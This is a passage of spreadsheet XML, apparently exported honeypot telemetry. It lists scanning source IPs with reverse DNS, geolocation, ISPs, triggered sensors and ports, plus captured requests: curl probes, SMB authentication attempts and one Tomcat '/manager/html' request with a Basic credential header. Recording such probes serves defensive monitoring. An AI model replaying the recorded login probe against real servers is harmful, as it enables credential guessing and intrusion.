    <t>SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_TELNET_H35</t>
  </si>
  <si>
    <t>23&amp;&amp;43008&amp;&amp;80&amp;&amp;32989&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:daa1:50db</t>
  </si>
  <si>
    <t>7fd4fff03d3eb6f1c0cb707e6f7654e2</t>
  </si>
  <si>
    <t>59.127.84.223</t>
  </si>
  <si>
    <t>59-127-84-223.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_SSH_H47&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H6</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;23&amp;&amp;45048&amp;&amp;33050&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7f:54df</t>
  </si>
  <si>
    <t>ee427300f9cd28e04e094d0738043842</t>
  </si>
  <si>
    <t>117.216.31.117</t>
  </si>
  <si>
    <t>::ffff:75d8:1f75</t>
  </si>
  <si>
    <t>caebc28ffba43a8921481fb31ce3cf93</t>
  </si>
  <si>
    <t>61.1.136.198</t>
  </si>
  <si>
    <t>::ffff:3d01:88c6</t>
  </si>
  <si>
    <t>d8947858b169ffdc70cf3a6b2c2b2946</t>
  </si>
  <si>
    <t>202.164.39.5</t>
  </si>
  <si>
    <t>Saboo Coating LTD</t>
  </si>
  <si>
    <t>2000-09-07</t>
  </si>
  <si>
    <t>SABOO-COATING-LTD</t>
  </si>
  <si>
    <t>::ffff:caa4:2705</t>
  </si>
  <si>
    <t>212d377305656e8151d4d4321dadecfb</t>
  </si>
  <si>
    <t>220.133.208.116</t>
  </si>
  <si>
    <t>220-133-208-116.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H30&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;36063&amp;&amp;23&amp;&amp;NA&amp;&amp;80&amp;&amp;9100&amp;&amp;34879</t>
  </si>
  <si>
    <t>::ffff:dc85:d074</t>
  </si>
  <si>
    <t>52695f12781f232154d431b5a35db188</t>
  </si>
  <si>
    <t>114.33.34.150</t>
  </si>
  <si>
    <t>114-33-34-150.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H37</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;30229&amp;&amp;23&amp;&amp;38384&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:7221:2296</t>
  </si>
  <si>
    <t>1d890a5d1c1779071cca9e4c3763fe98</t>
  </si>
  <si>
    <t>37.36.79.141</t>
  </si>
  <si>
    <t>::ffff:2524:4f8d</t>
  </si>
  <si>
    <t>d4177fe0df4b376abb983f8aabc2ccc3</t>
  </si>
  <si>
    <t>125.229.190.215</t>
  </si>
  <si>
    <t>125-229-190-215.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H13</t>
  </si>
  <si>
    <t>23&amp;&amp;25385&amp;&amp;60801&amp;&amp;60825&amp;&amp;49121&amp;&amp;60555&amp;&amp;60562&amp;&amp;9100&amp;&amp;80</t>
  </si>
  <si>
    <t>::ffff:7de5:bed7</t>
  </si>
  <si>
    <t>ca81d4a7513c50bd7f7ad747349d304a</t>
  </si>
  <si>
    <t>59.127.235.145</t>
  </si>
  <si>
    <t>NA&amp;&amp;59-127-235-145.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H12</t>
  </si>
  <si>
    <t>23&amp;&amp;50994&amp;&amp;54198&amp;&amp;54202&amp;&amp;40319&amp;&amp;40334&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:3b7f:eb91</t>
  </si>
  <si>
    <t>086ec22b038d968cb8a419501c49c19b</t>
  </si>
  <si>
    <t>59.126.80.9</t>
  </si>
  <si>
    <t>NA&amp;&amp;59-126-80-9.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;58257&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:5009</t>
  </si>
  <si>
    <t>cd9a0d242be9e8d436a126c64c7ae68e</t>
  </si>
  <si>
    <t>220.134.152.134</t>
  </si>
  <si>
    <t>220-134-152-134.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H24</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;6432&amp;&amp;23&amp;&amp;17332&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:dc86:9886</t>
  </si>
  <si>
    <t>fd391379990e68a8686173ecd1f52024</t>
  </si>
  <si>
    <t>59.127.129.13</t>
  </si>
  <si>
    <t>59-127-129-13.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H11</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;37266&amp;&amp;23&amp;&amp;80&amp;&amp;37325&amp;&amp;37337&amp;&amp;37362&amp;&amp;37372&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:3b7f:810d</t>
  </si>
  <si>
    <t>324e487c49e4143a3f6a274b31cdd052</t>
  </si>
  <si>
    <t>177.229.67.231</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_SSH_H24&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H31&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;22&amp;&amp;32779&amp;&amp;NA</t>
  </si>
  <si>
    <t>3998655</t>
  </si>
  <si>
    <t>21.1291</t>
  </si>
  <si>
    <t>-101.674</t>
  </si>
  <si>
    <t>13999</t>
  </si>
  <si>
    <t>Mega Cable, S.A. de C.V.</t>
  </si>
  <si>
    <t>Mega Cable, S.A. de C.V</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,3290)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,3371)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,27020)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,27064)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,3761)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,3806)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,37408)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,8649)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,14170)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,29913)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,56778)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,23707)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,50316)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,50394)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,28064)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,56379)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,49990)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,4449)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,8037)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,8061)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,3807)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,3841)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,25332)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,25404)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,1117)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (177.229.67.231,11480)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:b1e5:43e7</t>
  </si>
  <si>
    <t>a8698fb549187ec4f37c884b1c5328a1</t>
  </si>
  <si>
    <t>117.254.27.3</t>
  </si>
  <si>
    <t>::ffff:75fe:1b03</t>
  </si>
  <si>
    <t>6d7624c4469a0dfc46d0e3e2672e2e96</t>
  </si>
  <si>
    <t>14.249.114.43</t>
  </si>
  <si>
    <t>::ffff:ef9:722b</t>
  </si>
  <si>
    <t>4f0b4c4b6e5caa88bd1d517876b2a4b8</t>
  </si>
  <si>
    <t>101.108.147.183</t>
  </si>
  <si>
    <t>node-t6f.pool-101-108.dynamic.nt-isp.net</t>
  </si>
  <si>
    <t>Thawi Watthana</t>
  </si>
  <si>
    <t>7026994</t>
  </si>
  <si>
    <t>13.7885</t>
  </si>
  <si>
    <t>100.333</t>
  </si>
  <si>
    <t>::ffff:656c:93b7</t>
  </si>
  <si>
    <t>159d9537eeeefc6eafcc811500f022ac</t>
  </si>
  <si>
    <t>49.36.81.187</t>
  </si>
  <si>
    <t>::ffff:3124:51bb</t>
  </si>
  <si>
    <t>5ec7ebfa484fe803c822202daebb009c</t>
  </si>
  <si>
    <t>196.251.118.151</t>
  </si>
  <si>
    <t>401116</t>
  </si>
  <si>
    <t>Nybula LLC</t>
  </si>
  <si>
    <t>internet secuirty Nybula</t>
  </si>
  <si>
    <t>{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en-US,en;q=0.5', 'Authorization': 'Basic OGhZVFNVRms6OGhZVFNVRms=', 'Connection': 'close,close', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0', 'method': 'GET', 'uri': '/manager/html'}}&amp;&amp;{Data_HTTPS:NA}</t>
  </si>
  <si>
    <t>::ffff:c4fb:7697</t>
  </si>
  <si>
    <t>fe1469249a674f35fb45c6e76e5b0200</t>
  </si>
  <si>
    <t>27.64.194.18</t>
  </si>
  <si>
    <t>::ffff:1b40:c212</t>
  </si>
  <si>
    <t>47b8da7f4dc19b12ed4bbe8ec39b4754</t>
  </si>
  <si>
    <t>125.228.163.67</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-228-163-67.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMTP_H9&amp;&amp;SMA-LAB_LDAP_H4&amp;&amp;SMA-LAB_HTTPS_H2&amp;&amp;SMA-LAB_HTTP_H19&amp;&amp;SMA-LAB_SMB_H33&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;25&amp;&amp;389&amp;&amp;443&amp;&amp;80&amp;&amp;445&amp;&amp;26819&amp;&amp;23&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:7de4:a343</t>
  </si>
  <si>
    <t>0684141b5d16804bd364b5f0409d4bcf</t>
  </si>
  <si>
    <t>89.10.251.30</t>
  </si>
  <si>
    <t>NA&amp;&amp;30.89-10-251.nextgentel.com</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H29</t>
  </si>
  <si>
    <t>Vestland</t>
  </si>
  <si>
    <t>Bergen</t>
  </si>
  <si>
    <t>Sandsli (Fyllingsdalen)</t>
  </si>
  <si>
    <t>6697345</t>
  </si>
  <si>
    <t>5148</t>
  </si>
  <si>
    <t>60.2917</t>
  </si>
  <si>
    <t>5.28272</t>
  </si>
  <si>
    <t>15659</t>
  </si>
  <si>
    <t>NextGenTel AS</t>
  </si>
  <si>
    <t>NextGenTel Network</t>
  </si>
  <si>
    <t>2006-06-29</t>
  </si>
  <si>
    <t>::ffff:590a:fb1e</t>
  </si>
  <si>
    <t>575752d72ed658434c66128327f98c6a</t>
  </si>
  <si>
    <t>219.100.164.205</t>
  </si>
  <si>
    <t>user219100164205.ucatv.ne.jp&amp;&amp;NA</t>
  </si>
  <si>
    <t>18274</t>
  </si>
  <si>
    <t>Utsunomiya Cable TV Corporation</t>
  </si>
  <si>
    <t>::ffff:db64:a4cd</t>
  </si>
  <si>
    <t>e16ac3151e41d9a6a3f2f1553a37bb9b</t>
  </si>
  <si>
    <t>5.202.109.248</t>
  </si>
  <si>
    <t>IR-THR-PTE</t>
  </si>
  <si>
    <t>::ffff:5ca:6df8</t>
  </si>
  <si>
    <t>55a016201fc1a599639dac7221458067</t>
  </si>
  <si>
    <t>125.229.4.249</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-229-4-249.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_VNC_H20&amp;&amp;SMA-LAB_SIP_H16&amp;&amp;SMA-LAB_SOCKS5_H12&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_ORACLE_H21&amp;&amp;SMA-LAB_FTP_H14&amp;&amp;SMA-LAB_IPP_H37&amp;&amp;SMA-LAB_HTTPS_H18&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;S